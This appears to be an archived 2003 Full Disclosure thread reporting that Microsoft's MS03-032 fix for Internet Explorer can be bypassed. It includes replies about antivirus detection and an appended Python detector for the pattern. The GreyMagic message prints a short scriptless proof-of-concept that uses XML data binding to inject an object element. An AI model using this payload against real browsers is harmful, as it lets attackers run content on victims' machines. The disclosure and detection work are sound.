Full Disclosure mailing list archives

RE: RE: BAD NEWS: Microsoft Security Bulletin MS03-032


From: "Bergeron, Jared" <jared.bergeron () office xerox com>
Date: Mon, 8 Sep 2003 17:10:00 -0700

In our testing we found that Virusscan 7 caught this, however Virusscan 4.5x with the latest DAT did not.  


Regards,
---------------------
Jared Bergeron
Systems Analyst / XOG E-Security



-----Original Message-----
From: ADBecker () chmortgage com [mailto:ADBecker () chmortgage com] 
Sent: Monday, September 08, 2003 12:17 PM
To: GreyMagic Software
Cc: Bugtraq; full-disclosure () lists netsys com; http-equiv () excite com; NTBugtraq; Microsoft Security Response Center; vulnwatch () vulnwatch org
Subject: [Full-disclosure] RE: BAD NEWS: Microsoft Security Bulletin MS03-032






Updated antivirus software should catch this exploit and prevent any application from being launched.
We have McAfee VirusScan 7 Ent. which caught both exploit examples at http://greymagic.com/adv/gm001-ie/

Andrew Becker
C.H. Mortgage, D.R. Horton
Phoenix IT/MIS Department
Phone: (866) 639-7305
Fax: (480) 607-5383


From: "GreyMagic Software" <security@greymagic.com>
Date: 09/08/03 07:52 AM
To: "NTBugtraq" <NTBUGTRAQ () LISTSERV NTBUGTRAQ COM>, "Bugtraq" <bugtraq () securityfocus com>, <full-disclosure () lists netsys com>, <vulnwatch () vulnwatch org>
cc: <http-equiv () excite com>, "Microsoft Security Response Center" <secure () microsoft com>, (bcc: Andrew D Becker/Continental Homes)
Subject: RE: BAD NEWS: Microsoft Security Bulletin MS03-032




The patch for Drew's object data=funky.hta doesn't work:

This is the exact same issue as http://greymagic.com/adv/gm001-ie/, which explains the problem in detail. Microsoft 
again patches the object element in HTML, but it doesn't patch the dynamic version of that same element.

1. Disable Active Scripting

This actually means that no scripting is needed at all in order to exploit this amazingly critical vulnerability:

<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
    <security>
        <exploit>
            <![CDATA[
            <object data=x.asp></object>
            ]]>
        </exploit>
    </security>
</xml>

Ouch.








_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
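
A defensive check for the pattern described in the message above, as an added example that is not part of the original thread: it flags pages where an element bound with dataformatas="html" draws from an XML data island that contains an object element with a data attribute. The function names, regexes and sample pages are assumptions constructed for illustration.

```python
import html
import re

TAG = re.compile(r"<(\w+)\s([^>]*)>")
ATTR = re.compile(r'''([\w-]+)\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)''')
ISLAND = re.compile(r"<xml\b([^>]*)>(.*?)</xml\s*>", re.I | re.S)
OBJECT_DATA = re.compile(r"<object\b[^>]*\bdata\s*=", re.I)

# Constructed samples: the first mirrors the structure quoted in the post,
# the second binds plain text only.
SAMPLE_BOUND = """<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec"><security><exploit><![CDATA[
<object data=x.asp></object>
]]></exploit></security></xml>"""
SAMPLE_BENIGN = """<span datasrc="#oNews" datafld="title" dataformatas="html"></span>
<xml id="oNews"><feed><title>Quarterly results</title></feed></xml>"""


def attrs(raw):
    """Parse an attribute string into a dict with lower-cased keys."""
    return {k.lower(): v.strip("\"'") for k, v in ATTR.findall(raw)}


def find_databound_objects(page):
    """Return (tag, island_id) pairs for elements that render a data island
    as HTML when that island carries an <object data=...> element."""
    islands = {}
    for raw, body in ISLAND.findall(page):
        island_id = attrs(raw).get("id")
        if island_id:
            # The markup may sit in CDATA or be entity-escaped; unescape so
            # both forms are inspected the same way.
            islands[island_id.lower()] = html.unescape(body)
    findings = []
    for tag, raw in TAG.findall(page):
        a = attrs(raw)
        src = a.get("datasrc", "")
        if a.get("dataformatas", "").lower() != "html" or not src.startswith("#"):
            continue
        body = islands.get(src[1:].lower())
        if body and OBJECT_DATA.search(body):
            findings.append((tag.lower(), src[1:]))
    return findings


if __name__ == "__main__":
    print(find_databound_objects(SAMPLE_BOUND))   # flagged
    print(find_databound_objects(SAMPLE_BENIGN))  # nothing to report
```

A filter that only inspects static object tags in the page body would miss the first sample, which is the gap the message describes.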

